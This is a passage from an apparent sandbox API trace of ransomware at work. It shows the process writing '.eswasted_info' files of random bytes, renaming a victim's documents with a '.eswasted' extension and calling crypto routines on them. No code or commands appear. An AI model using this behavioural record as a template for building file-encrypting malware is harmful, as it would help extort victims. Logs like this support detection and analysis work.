lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.363] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71c050 | out: hHeap=0x6d0000) returned 1 [0075.363] lstrcpyW (in: lpString1=0x71ecf8, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0075.363] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\u-zzifvzTlp_CK\\SYwLmRQpeBwfxW_093\\39Tsq\\Fw8StRX8z_Nc7vd2tH.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cg7h\\u-zzifvztlp_ck\\sywlmrqpebwfxw_093\\39tsq\\fw8strx8z_nc7vd2th.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\u-zzifvzTlp_CK\\SYwLmRQpeBwfxW_093\\39Tsq\\Fw8StRX8z_Nc7vd2tH.pptx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cg7h\\u-zzifvztlp_ck\\sywlmrqpebwfxw_093\\39tsq\\fw8strx8z_nc7vd2th.pptx.eswasted")) returned 1 [0075.365] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\u-zzifvzTlp_CK\\SYwLmRQpeBwfxW_093\\39Tsq\\Fw8StRX8z_Nc7vd2tH.pptx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cg7h\\u-zzifvztlp_ck\\sywlmrqpebwfxw_093\\39tsq\\fw8strx8z_nc7vd2th.pptx.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0075.365] CreateFileMappingW (hFile=0x130, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x108 [0075.367] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0075.453] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0075.453] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.453] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0075.454] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0075.454] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.463] SetEndOfFile (hFile=0x124) returned 1 [0075.524] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412248 | out: hHeap=0x6d0000) returned 1 [0075.524] CloseHandle (hObject=0x124) returned 1 [0075.525] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0075.525] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0075.526] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0075.526] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.526] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\u-zzifvzTlp_CK\\SYwLmRQpeBwfxW_093\\39Tsq\\ti2 IpP48D2MDg.xls") returned 107 [0075.526] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2e0) returned 0x71ec18 [0075.526] lstrcpyW (in: lpString1=0x71ecee, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0075.526] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412248 [0075.526] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0075.527] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412248 | out: pbBuffer=0x1412248) returned 1 [0075.527] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.527] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\u-zzifvzTlp_CK\\SYwLmRQpeBwfxW_093\\39Tsq\\ti2 IpP48D2MDg.xls.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cg7h\\u-zzifvztlp_ck\\sywlmrqpebwfxw_093\\39tsq\\ti2 ipp48d2mdg.xls.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0075.528] WriteFile (in: hFile=0x124, lpBuffer=0x1412248*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1412248*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0075.529] SetEndOfFile (hFile=0x124) returned 1 [0075.529] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.529] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412248 | out: hHeap=0x6d0000) returned 1 [0075.529] lstrcpyW (in: lpString1=0x71ecee, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0075.529] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\u-zzifvzTlp_CK\\SYwLmRQpeBwfxW_093\\39Tsq\\ti2 IpP48D2MDg.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cg7h\\u-zzifvztlp_ck\\sywlmrqpebwfxw_093\\39tsq\\ti2 ipp48d2mdg.xls"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\u-zzifvzTlp_CK\\SYwLmRQpeBwfxW_093\\39Tsq\\ti2 IpP48D2MDg.xls.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cg7h\\u-zzifvztlp_ck\\sywlmrqpebwfxw_093\\39tsq\\ti2 ipp48d2mdg.xls.eswasted")) returned 1 [0075.530] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\u-zzifvzTlp_CK\\SYwLmRQpeBwfxW_093\\39Tsq\\ti2 IpP48D2MDg.xls.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cg7h\\u-zzifvztlp_ck\\sywlmrqpebwfxw_093\\39tsq\\ti2 ipp48d2mdg.xls.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0075.530] CreateFileMappingW (hFile=0x130, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0075.530] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0075.531] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0075.531] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.531] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0075.532] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0075.532] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.545] SetEndOfFile (hFile=0x124) returned 1 [0075.547] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412248 | out: hHeap=0x6d0000) returned 1 [0075.547] CloseHandle (hObject=0x124) returned 1 [0075.548] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0075.548] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0075.549] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0075.549] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.549] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\u-zzifvzTlp_CK\\SYwLmRQpeBwfxW_093\\39Tsq\\zRSwd2cPLtPKGm.csv") returned 107 [0075.549] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2e0) returned 0x71ec18 [0075.549] lstrcpyW (in: lpString1=0x71ecee, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0075.549] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412248 [0075.549] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0075.550] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412248 | out: pbBuffer=0x1412248) returned 1 [0075.550] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.550] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\u-zzifvzTlp_CK\\SYwLmRQpeBwfxW_093\\39Tsq\\zRSwd2cPLtPKGm.csv.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cg7h\\u-zzifvztlp_ck\\sywlmrqpebwfxw_093\\39tsq\\zrswd2cpltpkgm.csv.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0075.551] WriteFile (in: hFile=0x124, lpBuffer=0x1412248*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1412248*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0075.551] SetEndOfFile (hFile=0x124) returned 1 [0075.552] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.552] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412248 | out: hHeap=0x6d0000) returned 1 [0075.552] lstrcpyW (in: lpString1=0x71ecee, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0075.552] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\u-zzifvzTlp_CK\\SYwLmRQpeBwfxW_093\\39Tsq\\zRSwd2cPLtPKGm.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cg7h\\u-zzifvztlp_ck\\sywlmrqpebwfxw_093\\39tsq\\zrswd2cpltpkgm.csv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\u-zzifvzTlp_CK\\SYwLmRQpeBwfxW_093\\39Tsq\\zRSwd2cPLtPKGm.csv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cg7h\\u-zzifvztlp_ck\\sywlmrqpebwfxw_093\\39tsq\\zrswd2cpltpkgm.csv.eswasted")) returned 1 [0075.552] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\u-zzifvzTlp_CK\\SYwLmRQpeBwfxW_093\\39Tsq\\zRSwd2cPLtPKGm.csv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cg7h\\u-zzifvztlp_ck\\sywlmrqpebwfxw_093\\39tsq\\zrswd2cpltpkgm.csv.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0075.553] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x130 [0075.553] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0075.574] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0075.574] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.575] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0075.575] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0075.575] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.583] SetEndOfFile (hFile=0x124) returned 1 [0075.666] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412248 | out: hHeap=0x6d0000) returned 1 [0075.667] CloseHandle (hObject=0x124) returned 1 [0075.668] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0075.668] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0075.669] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0075.669] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.669] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\u-zzifvzTlp_CK\\ZMpMHpVtC4 chO8TI\\ep4-1OftiqYb.ppt") returned 98 [0075.669] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2ce) returned 0x71ec18 [0075.669] lstrcpyW (in: lpString1=0x71ecdc, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0075.669] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x71c050 [0075.669] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0075.670] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x71c050 | out: pbBuffer=0x71c050) returned 1 [0075.670] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.670] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\u-zzifvzTlp_CK\\ZMpMHpVtC4 chO8TI\\ep4-1OftiqYb.ppt.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cg7h\\u-zzifvztlp_ck\\zmpmhpvtc4 cho8ti\\ep4-1oftiqyb.ppt.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0075.673] WriteFile (in: hFile=0x124, lpBuffer=0x71c050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x71c050*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0075.674] SetEndOfFile (hFile=0x124) returned 1 [0075.674] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.674] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71c050 | out: hHeap=0x6d0000) returned 1 [0075.674] lstrcpyW (in: lpString1=0x71ecdc, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0075.674] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\u-zzifvzTlp_CK\\ZMpMHpVtC4 chO8TI\\ep4-1OftiqYb.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cg7h\\u-zzifvztlp_ck\\zmpmhpvtc4 cho8ti\\ep4-1oftiqyb.ppt"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\u-zzifvzTlp_CK\\ZMpMHpVtC4 chO8TI\\ep4-1OftiqYb.ppt.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cg7h\\u-zzifvztlp_ck\\zmpmhpvtc4 cho8ti\\ep4-1oftiqyb.ppt.eswasted")) returned 1 [0075.674] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\u-zzifvzTlp_CK\\ZMpMHpVtC4 chO8TI\\ep4-1OftiqYb.ppt.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cg7h\\u-zzifvztlp_ck\\zmpmhpvtc4 cho8ti\\ep4-1oftiqyb.ppt.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0075.674] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x130 [0075.675] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0075.676] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0075.676] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.676] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0075.677] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0075.677] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.685] SetEndOfFile (hFile=0x124) returned 1 [0075.687] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71c050 | out: hHeap=0x6d0000) returned 1 [0075.687] CloseHandle (hObject=0x124) returned 1 [0075.689] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0075.690] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0075.690] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0075.690] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.690] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\u-zzifvzTlp_CK\\ZMpMHpVtC4 chO8TI\\iqiv2uXQ3uTRD.csv") returned 99 [0075.690] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2d0) returned 0x71ec18 [0075.691] lstrcpyW (in: lpString1=0x71ecde, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0075.691] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x71c050 [0075.691] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0075.691] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x71c050 | out: pbBuffer=0x71c050) returned 1 [0075.691] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.691] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\u-zzifvzTlp_CK\\ZMpMHpVtC4 chO8TI\\iqiv2uXQ3uTRD.csv.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cg7h\\u-zzifvztlp_ck\\zmpmhpvtc4 cho8ti\\iqiv2uxq3utrd.csv.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0075.692] WriteFile (in: hFile=0x124, lpBuffer=0x71c050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x71c050*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0075.693] SetEndOfFile (hFile=0x124) returned 1 [0075.693] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.693] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71c050 | out: hHeap=0x6d0000) returned 1 [0075.693] lstrcpyW (in: lpString1=0x71ecde, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0075.693] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\u-zzifvzTlp_CK\\ZMpMHpVtC4 chO8TI\\iqiv2uXQ3uTRD.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cg7h\\u-zzifvztlp_ck\\zmpmhpvtc4 cho8ti\\iqiv2uxq3utrd.csv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\u-zzifvzTlp_CK\\ZMpMHpVtC4 chO8TI\\iqiv2uXQ3uTRD.csv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cg7h\\u-zzifvztlp_ck\\zmpmhpvtc4 cho8ti\\iqiv2uxq3utrd.csv.eswasted")) returned 1 [0075.694] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\u-zzifvzTlp_CK\\ZMpMHpVtC4 chO8TI\\iqiv2uXQ3uTRD.csv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cg7h\\u-zzifvztlp_ck\\zmpmhpvtc4 cho8ti\\iqiv2uxq3utrd.csv.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0075.694] CreateFileMappingW (hFile=0x130, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0075.694] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0075.695] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0075.695] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.695] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0075.695] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0075.695] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.704] SetEndOfFile (hFile=0x124) returned 1 [0075.706] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71c050 | out: hHeap=0x6d0000) returned 1 [0075.706] CloseHandle (hObject=0x124) returned 1 [0075.708] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0075.708] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0075.709] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0075.709] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.709] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\u-zzifvzTlp_CK\\ZMpMHpVtC4 chO8TI\\OLgjUQnqccd626W.pdf") returned 101 [0075.709] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2d4) returned 0x71ec18 [0075.709] lstrcpyW (in: lpString1=0x71ece2, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0075.709] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x71c050 [0075.709] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0075.710] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x71c050 | out: pbBuffer=0x71c050) returned 1 [0075.710] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.710] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\u-zzifvzTlp_CK\\ZMpMHpVtC4 chO8TI\\OLgjUQnqccd626W.pdf.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cg7h\\u-zzifvztlp_ck\\zmpmhpvtc4 cho8ti\\olgjuqnqccd626w.pdf.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0075.774] WriteFile (in: hFile=0x124, lpBuffer=0x71c050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x71c050*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0075.775] SetEndOfFile (hFile=0x124) returned 1 [0075.775] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.775] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71c050 | out: hHeap=0x6d0000) returned 1 [0075.775] lstrcpyW (in: lpString1=0x71ece2, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0075.775] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\u-zzifvzTlp_CK\\ZMpMHpVtC4 chO8TI\\OLgjUQnqccd626W.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cg7h\\u-zzifvztlp_ck\\zmpmhpvtc4 cho8ti\\olgjuqnqccd626w.pdf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 